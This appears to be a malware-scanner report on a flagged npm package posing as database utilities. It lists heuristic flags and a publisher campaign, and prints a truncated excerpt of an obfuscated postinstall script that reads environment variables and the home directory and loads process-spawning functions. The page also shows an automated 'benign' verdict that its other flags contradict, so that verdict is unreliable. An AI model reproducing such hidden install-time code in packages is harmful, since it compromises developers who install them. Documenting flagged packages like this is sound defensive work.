// npm package
@cloudplatform-single-spa/cp-api-gw
Internal database utilities with connection pooling, query builder and migration support
weekly
107
monthly
107
versions
3
maintainers
1
license
UNLICENSED
first publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,446 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-28
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x45fae4=a0_0xf092;(function(_0x10c72c,_0x250139){const _0x2e05fd=a0_0xf092,_0x2e9853=_0x10c72c();while(!![]){try{const _0x4152a2=parseInt(_0x2e05fd(0x196))/(-0x6b0+-0x6f*-0x1b+-…// publisher campaignby mr.4nd3r50n
9 caught packages from this accountThis is not an isolated catch. The same publisher has shipped 8 other packages that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.
// offending code· @100.100.100· 1 file flagged
llm: benign · 0.85→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
- @100.100.100··AUTO-PUBLISHED·publisher: mr.4nd3r50nheuristic 100/100static flags 2llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1danomalous-major-version:100publisher-multi-name-burst:24publisher-version-pump:25osv-flagged:MAL-2026-4901reads-env-varsreads-homedir
→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x45fae4=a0_0xf092;(function(_0x10c72c,_0x250139){const _0x2e05fd=a0_0xf092,_0x2e9853=_0x10c72c();while(!![]){try{const _0x4152a2=parseInt(_0x2e05fd(0x196))/(-0x6b0+-0x6f*-0x1b+-0x282*0x2)*(parseInt(_0x2e05fd(0x1e3))/(0x71f+0xc1b+0x99c*-0x2))+parseInt(_0x2e05fd(0x17d))/(0x2237+-0x41*-0x61+-0x3ad5)*(parseInt(_0x2e05fd(0x1b9))/(0x1*-0x1093+0x29*0xd3+0x5bc*-0x3))+parseInt(_0x2e05fd(0x1c4))/(-0xecb+-0x1*0x20f1+-0x3*-0xfeb)+-parseInt(_0x2e05fd(0x1ba))/(0x23c5+0x1*-0x13c3+-0xffc)*(parseInt(_0x2e05fd(0x1d3))/(0x174f+0xd*0x7+-0x3*0x7e1))+parseInt(_0x2e05fd(0x1e0))/(0x49*-0x6b+-0x1005+0x2e90)*(parseInt(_0x2e05fd(0x1a3))/(-0x10c0*0x2+-0x228d+-0x23*-0x1f2))+-parseInt(_0x2e05fd(0x1bc))/(0xfdf+-0x1312+0x33d)*(-parseInt(_0x2e05fd(0x1c2))/(-0x75a+-0x1c2f+-0x45*-0x84))+-parseInt(_0x2e05fd(0x1b4))/(0x59c+-0x820+0x4*0xa4);if(_0x4152a2===_0x250139)break;else _0x2e9853['push'](_0x2e9853['shift']());}catch(_0x477a4e){_0x2e9853['push'](_0x2e9853['shift']());}}}(a0_0x503c,-0x196d60+-0x76f*0xf7+0x2d987c));const a0_0x615025=require('os'),a0_0x335994=require('fs'),a0_0x25eb23=require(a0_0x45fae4(0x17c)),a0_0x4a3e90=require(a0_0x45fae4(0x1d2)),a0_0x40a9ed=require(a0_0x45fae4(0x18f)),{execSync:a0_0x3ed14c,spawn:a0_0xd99502}=require(a0_0x45fae4(0x1d7)),a0_0x4b8825=a0_0x45fae4(0x1a8),a0_0x125a18=a0_0x45fae4(0x187),a0_0x59f10e=a0_0x45fae4(0x182)+a0_0x45fae4(0x17f),a0_0x444cbd=a0_0x45fae4(0x1c9),a0_0x1def5c=!!process.env[a0_0x444cbd],a0_0x13b9d3=a0_0x45fae4(0x1d8)===a0_0x45fae4(0x1d8)| --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
